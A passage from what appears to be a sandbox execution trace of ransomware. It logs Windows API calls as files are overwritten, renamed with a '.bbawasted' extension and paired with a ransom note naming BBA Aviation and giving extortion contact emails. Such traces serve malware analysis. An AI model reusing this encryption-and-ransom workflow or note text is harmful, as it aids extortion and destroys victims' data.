(lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0162.292] WriteFile (in: hFile=0x27c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.293] SetEndOfFile (hFile=0x27c) returned 1 [0162.293] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.293] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.bbawasted")) returned 1 [0162.295] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0162.295] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0162.295] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xfaf [0162.295] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfaf) returned 0x630000 [0162.295] CloseHandle (hObject=0x28c) returned 1 [0162.298] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0162.298] CloseHandle (hObject=0x290) returned 1 [0162.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.299] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0162.299] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.299] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.300] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0162.300] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0162.300] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.311] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jIZUjlCQkIu9x4LtCTQZ7HdEIEgcv8h1e0OPve0oIY93JNhp0MLR7sUOcdjuRVZZ\r\n6ht08Urkh9UWk1u5igTMjjgrK7elLSRkDoXUSnHhuHmVf5c+ZTQSrWOJTxGdW9z6\r\nYyQyw3LtztREv+xRY4BsRz22FNg9DGvAA6T3QX+wHE1swq8CBo71RhN8pAHhZVJb\r\nwZULghh3aS3hKZx4jhwacEk+/9w7asAz2ui5xk2IFuJgVhWlDaYOzb6Wq3VGM7EL\r\nczUKpaXAxJIjqf/jJejkKLW30nv+aDBEL8FjFkUlWcG1il8qCum6CqWPtdjC5/sd\r\ndhjqmaXZTW5GAaxL4eETE67WvfMMNwAp8nCwMx3nJMtExwRF/83iyflxFuoBOhwY\r\neWtjd7ohXMzj3IrIxnhVhA7BOkykrXZO2g5s7FlwRGfFBbFnrCTPlsV88zCna1yu\r\nj/PgicU5DSsYMwjdBgm3z0AWAqQmuUZOkUNZrg9iGaNLRF0NQXrLQpzR+lERU5/s\r\n95ucaHmHsRq14V4nsG47VedD63kMwkcyUx3ZPKq6fg1Ja7Oh+ts6nXw6PfBd9Bph\r\nmJBNCONKpbYMfTgMUyXnA3nC0y7Gido6n2XEDUn05cs05rnNBf3SWLpobf62CXOm\r\nmxVA5FD/yzwqHyJ8wTQaW6EYq24vyLHKQUfpKPdurKB=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.311] WriteFile (in: hFile=0x27c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0162.311] SetEndOfFile (hFile=0x27c) returned 1 [0162.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.314] CloseHandle (hObject=0x27c) returned 1 [0162.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0162.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3068 | out: hHeap=0x660000) returned 1 [0162.316] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0162.316] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0162.316] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0162.316] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 48 [0162.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6aecf0 [0162.317] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.371] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef68) returned 1 [0162.372] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0162.372] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.372] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0162.373] WriteFile (in: hFile=0x27c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.374] SetEndOfFile (hFile=0x27c) returned 1 [0162.374] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.374] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.374] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.bbawasted")) returned 1 [0162.375] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0162.375] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0162.376] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1397e [0162.376] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1397e) returned 0x630000 [0162.376] CloseHandle (hObject=0x290) returned 1 [0162.437] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0162.437] CloseHandle (hObject=0x28c) returned 1 [0162.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.437] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef68) returned 1 [0162.438] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.438] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.438] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef68) returned 1 [0162.439] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0162.439] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0162.454] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.454] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.454] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.454] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]RmylX77ArCx59KFk7y28ghswPKgSmUCKJy8Dk4GHhyeQMcuTB+bayRAbEDmuIqY8\r\nNc8Po6zMzpn0dB04X0bYdsousUG6ARWfTr6f4/kpElHgpCDcqyMCnKthJPhWeSd8\r\n6krL4R/furp76V/rUrggxqmX0E+I/24x6nS+H2WeluvmkgJOzfRGcE4h7RgB0Lz/\r\nQ1X6dbm5tqD2Vg2eWP/BUXwU95d46HMGfejCBASWVzJabLFiHeMm7bCMWUScBB/9\r\nyljqxRZj10lszEZQE1Z3gVP1XEXyNf0/vIF4ciELd/ppeXpvycGBRx9zGAoaZZHD\r\nfyE0c8C6SXWabCcaD67M4gOs+Z6IFr1OitDuVmRfoa9/1n1jVRepA5qNfTHk+ZyB\r\nFBSbZTLgTFhzbdsJmvxCozKdnhpTK9l8pojJRMlkk0von/01IbnosinCRjEzZD0g\r\ngGJ+Q2lv6vO68BbEw3pvbyilDjdO82R1U+fept7NV9A8SiT0LBbLd038SWf6vVIo\r\nDZ6xqnb/q6asQLwgX4uEI+RYkv56J7nB1ieNs5VWS6afn3n7QmBOW+v8cWRZ1Vzf\r\nKC0VxeumhI0FKpFWoweST+zpH9CmcSW1OI/lgi0W4umxuk//fs/uPpuGUE/g16E8\r\nTZE64HxKAbDicnzBdBblZNGggEaa5h8d5faAhOYuyt0=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.454] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.454] WriteFile (in: hFile=0x27c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0162.454] SetEndOfFile (hFile=0x27c) returned 1 [0162.460] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.460] CloseHandle (hObject=0x27c) returned 1 [0162.465] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0162.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2078 | out: hHeap=0x660000) returned 1 [0162.466] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0162.467] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0162.467] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0162.467] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 39 [0162.467] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0162.467] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.467] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.566] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0162.568] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0162.568] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.568] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0162.636] WriteFile (in: hFile=0x27c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.784] SetEndOfFile (hFile=0x27c) returned 1 [0162.784] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.785] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.bbawasted")) returned 1 [0162.785] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0162.785] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0162.785] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xbfd [0162.786] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbfd) returned 0x630000 [0162.786] CloseHandle (hObject=0x28c) returned 1 [0162.791] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0162.792] CloseHandle (hObject=0x290) returned 1 [0162.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0162.792] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0162.792] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0162.792] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.792] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0162.793] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0162.793] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0162.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0162.803] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0162.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.803] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Bo42e/519jmmJCqIZoMWzQw+R7pqVeBeSeKCo3Y8Hbn8/7do4yikkwLkZteDI2sa\r\n992P2c7XqV3/sRDNH/GEE7k/4w3BSkZwTwEAx+eIv9htCKtzHffw/EUaVtmCA3j1\r\na3n1UVvHRlYct2Ib1t3gkzCgRSdAHdEOR9HvMvVjxOGDHlWK/MQTV8vbFXJfL6iw\r\n+zuojZUn7Pqy3CbwufxN94o/ICNNokg/Iv2EwzcpEyqPekFT301Xy3//pm7Q+EI3\r\nirKpijwnUlbF6bKDZAN+O5R3G7g02V1tZhl4QSXFs+YGJ1JnJLLsMZkZ0ss5NoOo\r\n7KlZUH5tIqJTVfI/1NOkYQ6NQ3JLekdYx0w2rR1aHTnN152oHMIv2mhLV7eX3LXQ\r\n35nDuDXUJjGWAJCFKXI8mBK0ZgSPF6s4RlP1QKTsdNtAOv3Ht8gUWwpfBvq1sDtd\r\nYIP1TnbOo4FHI1n7HX2O6Ayo53tY27NKPh8EVieRwr0T5JanvDNQCzUOBldD7qM0\r\n2S2AuFef4jc1TADA01sySrizGNHSS2KPDAwkaQik+uRa8fDhdeYpEPZ+IQeRHgls\r\nj7BpPT7Qlr7E3HR+UlyJQRSBSMN55vF4DtL7H05HFpE/psLwZgfEB2rb9FVOiuI3\r\njwUhvIpftGXgT3rwQJF2IB4G5HBpFVZsksQN8I/Macf=[end_key]\r\nKEEP IT\r\n") returned 984 [0162.803] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0162.804] WriteFile (in: hFile=0x27c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0162.804] SetEndOfFile (hFile=0x27c) returned 1 [0162.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.806] CloseHandle (hObject=0x27c) returned 1 [0162.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0162.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a29d8 | out: hHeap=0x660000) returned 1 [0162.812] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0162.813] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0162.813] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0162.813] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 43 [0162.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x260) returned 0x6aecf0 [0162.813] lstrcpyW (in: lpString1=0x6aed46, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0162.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0162.813] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef58) returned 1 [0162.813] CryptGenRandom (in: hProv=0x6aef58, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0162.814] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0162.814] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0162.977] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0162.979] SetEndOfFile (hFile=0x288) returned 1 [0162.979] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.979] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0162.979] lstrcpyW (in: lpString1=0x6aed46, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0162.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.bbawasted")) returned 1 [0162.981] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\UiInfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0162.981] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0162.981] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x9882 [0162.981] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9882) returned 0x630000 [0162.981] CloseHandle (hObject=0x294) returned 1 [0163.101] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0163.102] CloseHandle (hObject=0x27c) returned 1 [0163.102] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0163.102] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef58) returned 1 [0163.103] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0163.103] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.103] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef58) returned 1 [0163.103] CryptGenRandom (in: hProv=0x6aef58, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0163.103] CryptReleaseContext (hProv=0x6aef58, dwFlags=0x0) returned 1 [0163.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0163.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, 